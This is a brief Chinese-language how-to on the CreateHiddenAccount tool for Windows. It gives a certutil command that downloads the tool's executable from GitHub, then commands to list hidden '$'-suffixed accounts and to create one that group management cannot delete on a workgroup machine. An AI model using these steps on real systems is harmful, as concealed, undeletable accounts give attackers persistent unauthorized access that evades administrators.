前言
通过wgpsec/CreateHiddenAccount查看和创建Windows隐藏用户
隐藏用户的用户名以$作为后缀,不会在net user中显示,但是可以在用户和计算机管理中查看
如果使用net user <username>$ <password> /add命令创建的隐藏用户,在域控和工作组中都可以被删除,如果使用wgpsec/CreateHiddenAccount创建的隐藏用户,可以在域控上被删除,但无法在工作组中被删除,原因是在创建隐藏用户后,还在注册表中进行了配置,将该用户隶属于设置为空,导致没有任何组可以删除这个用户
下载项目
1
| certutil -urlcache -split -f "https://github.com/wgpsec/CreateHiddenAccount/releases/download/0.2/CreateHiddenAccount_v0.2.exe"
|
查看所有隐藏用户
1
| .\CreateHiddenAccount_v0.2.exe -c
|
创建隐藏用户
-u <username>:指定用户名,用户名如果没有$后缀则会自动添加$后缀
-p <password>:指定密码
1
| .\CreateHiddenAccount_v0.2.exe -u <username> -p <password>
|
完成